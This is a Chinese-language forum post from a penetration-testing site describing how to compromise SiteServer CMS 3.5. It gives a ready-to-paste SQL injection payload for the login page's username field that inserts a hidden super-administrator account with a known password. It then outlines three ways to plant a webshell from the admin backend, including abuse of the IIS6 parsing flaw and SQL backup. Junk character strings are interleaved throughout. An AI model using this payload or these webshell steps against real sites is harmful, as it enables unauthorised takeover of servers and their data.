中国网络渗透测试联盟
标题:
SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
[打印本页]
作者:
admin
时间:
2013-2-16 21:40
标题:
SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
经测试秒杀最新的3.5版
: N }+ W0 |) i$ ]2 T" F! Q O) o5 W" G
stieserver官网:
www.siteserver.cn
* X1 J0 J% |4 W+ x$ e% {
EXP:
( T- B9 c- Q" B+ l3 H
直接访问UserCenter/login.aspx
5 m3 h! b% E) K6 p( W- x7 p
用户名处输入:
+ x/ U, p6 g+ a$ p
/ S5 s2 t/ a; l8 W" D! \1 @# w
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
! Z* I; p/ X) L
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
2 m/ f2 d+ n; a7 J: o0 ?/ Y( S
之后再访问后台SiteServer/login.aspx用插入的用户登陆
" t' x8 l7 M) W, v) `
后台拿webshell的三种方法:
. H) L9 w' C6 f. ~7 Y
一、
$ {4 Z. V- s1 \+ s4 x8 m
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
9 E& q f- a7 y: X) `
二、
5 c/ c7 R4 D' d# c: [6 ?8 d& i1 O
成员权限-》添加用户-》用户名为:1.asp
9 X- d. g9 W8 O' H4 a( M
http://127.0.0.1/usercenter/
?. c( M. s H& v4 K, B& V
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
' `* }0 ^% L/ V/ o6 X! t* ~* m$ I0 m
(ps:后台添加用户时不会验证是否含有非法字符)
& d1 z g5 p) |- \
三、
2 R- Z3 a8 ?8 V: D1 k0 |+ B
系统工具-》实用工具-》机器参数查看
) |1 Z% c* {* y, _0 ]3 W
可以看到数据库类型、名称,WEB路径
! \2 y5 `6 g3 _
系统工具-》数据库工具-》SQL语句查询
! }$ m9 a$ B$ [9 v
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2